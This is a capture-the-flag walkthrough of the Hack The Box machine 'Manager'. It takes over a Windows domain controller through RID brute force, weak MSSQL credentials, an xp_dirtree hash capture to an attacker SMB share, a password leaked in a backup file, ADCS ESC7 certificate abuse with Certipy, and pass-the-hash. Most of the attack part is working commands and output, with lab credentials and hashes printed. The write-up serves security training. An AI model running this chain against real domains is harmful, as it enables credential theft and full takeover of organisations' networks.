| Machine Name | Difficulty | Date Started | Date Completed |
|---|---|---|---|
| Manager | Medium | 23/10/2023 | 23/10/2023 |
Learning Points :
- Enumerating internal file systems using MSSQL Service
- Exploiting ADCS ESC7 Vulnerability
Attack Path :
- Perform a RID brute force attack using CME to identify users.
- Perform a password attack with the format ‘username:username’ and identify valid credentials to log in to the MSSQL service.
- Read internal files using the MSSQL service and identify a website backup containing credentials of a user.
- Log in to the machine as the user and get the user flag.
- Identify that the machine is vulnerable to the ADCS ESC7 vulnerability and exploit it to get the hash of the administrator as described in Hacktricks - Attack 2.
- Use the hash to perform a Pass-the-Hash (PtH) attack using Evil-WinRM and log in to the machine to get the root flag.
Default Nmap scan :
┌──(parallels㉿kali-linux-2022-2)-[~/ctf-htb/manager]
└─$ nmap -sC -sV 10.10.11.236 -Pn
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-23 09:57 +0530
Nmap scan report for 10.10.11.236
Host is up (0.31s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Manager
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-10-23 11:27:46Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2023-10-23T11:29:13+00:00; +7h00m00s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-10-23T11:29:12+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 10.10.11.236:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.10.11.236:1433:
| Target_Name: MANAGER
| NetBIOS_Domain_Name: MANAGER
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: manager.htb
| DNS_Computer_Name: dc01.manager.htb
| DNS_Tree_Name: manager.htb
|_ Product_Version: 10.0.17763
|_ssl-date: 2023-10-23T11:29:13+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-10-23T08:55:07
|_Not valid after: 2053-10-23T08:55:07
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2023-10-23T11:29:13+00:00; +7h00m00s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2023-10-23T11:29:12+00:00; +6h59m59s from scanner time.
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-10-23T11:28:36
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.69 secondsWe were not able to enumerate any users using tools such as Kerbrute. However, we performed a RID brute-force attack using CrackMapExec and were able to dump some users for further enumeration.
┌──(parallels㉿kali-linux-2022-2)-[~]
└─$ crackmapexec smb manager.htb -u 'anonymous' -p '' --rid-brute
SMB manager.htb 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB manager.htb 445 DC01 [+] manager.htb\anonymous:
SMB manager.htb 445 DC01 [+] Brute forcing RIDs
SMB manager.htb 445 DC01 498: MANAGER\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB manager.htb 445 DC01 500: MANAGER\Administrator (SidTypeUser)
SMB manager.htb 445 DC01 501: MANAGER\Guest (SidTypeUser)
SMB manager.htb 445 DC01 502: MANAGER\krbtgt (SidTypeUser)
SMB manager.htb 445 DC01 512: MANAGER\Domain Admins (SidTypeGroup)
SMB manager.htb 445 DC01 513: MANAGER\Domain Users (SidTypeGroup)
SMB manager.htb 445 DC01 514: MANAGER\Domain Guests (SidTypeGroup)
SMB manager.htb 445 DC01 515: MANAGER\Domain Computers (SidTypeGroup)
SMB manager.htb 445 DC01 516: MANAGER\Domain Controllers (SidTypeGroup)
SMB manager.htb 445 DC01 517: MANAGER\Cert Publishers (SidTypeAlias)
SMB manager.htb 445 DC01 518: MANAGER\Schema Admins (SidTypeGroup)
SMB manager.htb 445 DC01 519: MANAGER\Enterprise Admins (SidTypeGroup)
SMB manager.htb 445 DC01 520: MANAGER\Group Policy Creator Owners (SidTypeGroup)
SMB manager.htb 445 DC01 521: MANAGER\Read-only Domain Controllers (SidTypeGroup)
SMB manager.htb 445 DC01 522: MANAGER\Cloneable Domain Controllers (SidTypeGroup)
SMB manager.htb 445 DC01 525: MANAGER\Protected Users (SidTypeGroup)
SMB manager.htb 445 DC01 526: MANAGER\Key Admins (SidTypeGroup)
SMB manager.htb 445 DC01 527: MANAGER\Enterprise Key Admins (SidTypeGroup)
SMB manager.htb 445 DC01 553: MANAGER\RAS and IAS Servers (SidTypeAlias)
SMB manager.htb 445 DC01 571: MANAGER\Allowed RODC Password Replication Group (SidTypeAlias)
SMB manager.htb 445 DC01 572: MANAGER\Denied RODC Password Replication Group (SidTypeAlias)
SMB manager.htb 445 DC01 1000: MANAGER\DC01$ (SidTypeUser)
SMB manager.htb 445 DC01 1101: MANAGER\DnsAdmins (SidTypeAlias)
SMB manager.htb 445 DC01 1102: MANAGER\DnsUpdateProxy (SidTypeGroup)
SMB manager.htb 445 DC01 1103: MANAGER\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
SMB manager.htb 445 DC01 1113: MANAGER\Zhong (SidTypeUser)
SMB manager.htb 445 DC01 1114: MANAGER\Cheng (SidTypeUser)
SMB manager.htb 445 DC01 1115: MANAGER\Ryan (SidTypeUser)
SMB manager.htb 445 DC01 1116: MANAGER\Raven (SidTypeUser)
SMB manager.htb 445 DC01 1117: MANAGER\JinWoo (SidTypeUser)
SMB manager.htb 445 DC01 1118: MANAGER\ChinHae (SidTypeUser)
SMB manager.htb 445 DC01 1119: MANAGER\Operator (SidTypeUser)
We performed a password attack using the format username:username and were able to identify that Operator:operator could be used to log in to the MSSQL service using Hydra. We then used these credentials to access the MSSQL service using the Impacket mssqlclient.py script.
┌──(parallels㉿kali-linux-2022-2)-[~/ctf-htb/manager]
└─$ impacket-mssqlclient -p 1433 -windows-auth -dc-ip 10.10.11.236 "manager.htb/Operator:operator"@10.10.11.236
Impacket v0.10.1.dev1+20230327.122651.a3f0373d - Copyright 2022 Fortra
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL> help
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
! {cmd} - executes a local shell cmd
We were able to trigger a NetNTLM relay attack and capture the NTLMv2 hash of the user manager to our Responder.
Read more: MSSQL Pentesting
Executing the command
SQL> exec master.dbo.xp_dirtree '\\10.10.14.218\any\thing'
Capturing the hash using Responder :
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.236
[SMB] NTLMv2-SSP Username : MANAGER\DC01$
[SMB] NTLMv2-SSP Hash : DC01$::MANAGER:0a281460292a20ff:E8D6B9C3E8F0F54F4E2C21F2B173C53B:010100000000000000FE0D8DA805DA01B159735AB4BFB0410000000002000800550058004700590001001E00570049004E002D0058004A0037005400380053004600330037004F00560004003400570049004E002D0058004A0037005400380053004600330037004F0056002E0055005800470059002E004C004F00430041004C000300140055005800470059002E004C004F00430041004C000500140055005800470059002E004C004F00430041004C000700080000FE0D8DA805DA010600040002000000080030003000000000000000000000000030000052353994DE936AB718DB78B8AAE473BD36EEF4B30C56C629439BE27C6D664CB70A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003200310038000000000000000000
We couldn’t use the hash for anything useful, so we tried to enumerate MSSQL further. We were able to list directories using the same command we used to capture the hash:
SQL> EXEC master.dbo.xp_dirtree '\', 1, 1;
subdirectory depth file
------------------------- ----- ----
$Recycle.Bin 1 0
Documents and Settings 1 0
inetpub 1 0
PerfLogs 1 0
Program Files 1 0
Program Files (x86) 1 0
ProgramData 1 0
Recovery 1 0
SQL2019 1 0
System Volume Information 1 0
temp 1 0
Users 1 0
Windows 1 0
SQL> EXEC master.dbo.xp_dirtree '\inetpub', 1, 1;
subdirectory depth file
------------ ----- ----
custerr 1 0
history 1 0
logs 1 0
temp 1 0
wwwroot 1 0
SQL> EXEC master.dbo.xp_dirtree '\inetpub\wwwroot', 1, 1;
subdirectory depth file
------------------------------- ----- ----
about.html 1 1
contact.html 1 1
css 1 0
images 1 0
index.html 1 1
js 1 0
service.html 1 1
web.config 1 1
website-backup-27-07-23-old.zip 1 1
We were able to download the ZIP file to our local machine by visiting the webpage http://10.10.11.236/website-backup-27-07-23-old.zip (as the ZIP file was hosted in the same directory as the webpage).
Inside the extracted files, we encountered a hidden file that contained the credentials of the user raven:
┌──(parallels㉿kali-linux-2022-2)-[~/ctf-htb/manager/zip]
└─$ ls -la
total 1092
drwxr-xr-x 5 parallels parallels 4096 Oct 23 12:45 .
drwxr-xr-x 6 parallels parallels 4096 Oct 23 12:45 ..
-rw-r--r-- 1 parallels parallels 5386 Jul 27 05:32 about.html
-rw-r--r-- 1 parallels parallels 5317 Jul 27 05:32 contact.html
drwxr-xr-x 2 parallels parallels 4096 Oct 23 12:45 css
drwxr-xr-x 2 parallels parallels 4096 Oct 23 12:45 images
-rw-r--r-- 1 parallels parallels 18203 Jul 27 05:32 index.html
drwxr-xr-x 2 parallels parallels 4096 Oct 23 12:45 js
-rw-r--r-- 1 parallels parallels 698 Jul 27 05:35 .old-conf.xml
-rw-r--r-- 1 parallels parallels 7900 Jul 27 05:32 service.html
-rw-r--r-- 1 parallels parallels 1045328 Oct 23 12:44 website-backup-27-07-23-old.zip
┌──(parallels㉿kali-linux-2022-2)-[~/ctf-htb/manager/zip]
└─$ cat .old-conf.xml
<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<server>
<host>dc01.manager.htb</host>
<open-port enabled="true">389</open-port>
<secure-port enabled="false">0</secure-port>
<search-base>dc=manager,dc=htb</search-base>
<server-type>microsoft</server-type>
<access-user>
<user>raven@manager.htb</user>
<password>R4v3nBe5tD3veloP3r!123</password>
</access-user>
<uid-attribute>cn</uid-attribute>
</server>
<search type="full">
<dir-list>
<dir>cn=Operator1,CN=users,dc=manager,dc=htb</dir>
</dir-list>
</search>
</ldap-conf>
We were able to use Evil-WinRM to log in to the machine as the user raven and capture the user flag:
Privilege Escalation
While enumerating, we discovered that the Domain Controller was vulnerable to Vulnerable Certificate Authority Access Control - ESC7 using Certipy. We performed the attack described in Hacktricks - Attack 2 and were able to escalate to administrator and retrieve the root flag.
We grant ourself the **Manage Certificates** access right by adding our user as a new officer.
┌──(parallels㉿kali-linux-2022-2)-[~/ctf-htb/manager]
└─$ certipy-ad ca -ca 'manager-DC01-CA' -add-officer raven -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Successfully added officer 'Raven' on 'manager-DC01-CA'
The SubCA template can be enabled on the CA with the -enable-template parameter. By default, the SubCA template is enabled.
┌──(parallels㉿kali-linux-2022-2)-[~/ctf-htb/manager]
└─$ certipy-ad ca -ca 'manager-DC01-CA' -enable-template SubCA -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Successfully enabled 'SubCA' on 'manager-DC01-CA'
We can start by requesting a certificate based on the SubCA template .
This request will be denied, but we will save the private key and note down the request ID.
┌──(parallels㉿kali-linux-2022-2)-[~/ctf-htb/manager]
└─$ certipy-ad req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -target dc01.manager.htb -template SubCA -upn administrator@manager.htb
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 31
Would you like to save the private key? (y/N) y
[*] Saved private key to 31.key
[-] Failed to request certificate
With our Manage CA and Manage Certificates, we can then issue the failed certificate request with the ca command and the -issue-request <request ID> parameter.
┌──(parallels㉿kali-linux-2022-2)-[~/ctf-htb/manager]
└─$ certipy-ad ca -ca 'manager-DC01-CA' -issue-request 31 -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Successfully issued certificate
And finally, we can retrieve the issued certificate with the req command and the -retrieve <request ID> parameter.
┌──(parallels㉿kali-linux-2022-2)-[~/ctf-htb/manager]
└─$ certipy-ad req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -target dc01.manager.htb -retrieve 31
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Rerieving certificate with ID 31
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'
[*] Certificate has no object SID
[*] Loaded private key from '31.key'
[*] Saved certificate and private key to 'administrator.pfx'
Then we used the administrator.pfx certificate to grab the hash of the Administrator . but failed several times because the Server time was different.
┌──(parallels㉿kali-linux-2022-2)-[~/ctf-htb/manager]
└─$ certipy-ad auth -pfx "administrator.pfx" -dc-ip 10.10.11.236 -username 'administrator' -domain 'manager.htb'
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
We tried several ways to modify the time but failed, and finally found a tool named ntupdate to update the time to the servers time.
┌──(parallels㉿kali-linux-2022-2)-[~/ctf-htb/manager]
└─$ sudo ntpdate 10.10.11.236
2023-10-23 22:04:40.186599 (+0530) +25198.078677 +/- 0.157152 10.10.11.236 s1 no-leap
CLOCK: time stepped by 25198.078677
Then we were able to Grab the hash of the administrator :
┌──(parallels㉿kali-linux-2022-2)-[~/ctf-htb/manager]
└─$ certipy-ad auth -pfx "administrator.pfx" -dc-ip 10.10.11.236 -username 'administrator' -domain 'manager.htb'
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef
We were able to login using EvilWinRm to the machine using the hash :
┌──(parallels㉿kali-linux-2022-2)-[~/ctf-htb/manager]
└─$ evil-winrm -i 10.10.11.236 -u Administrator -H "ae5064c2f62317332c88629e025924ef"
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 10/23/2023 1:55 AM 34 root.txt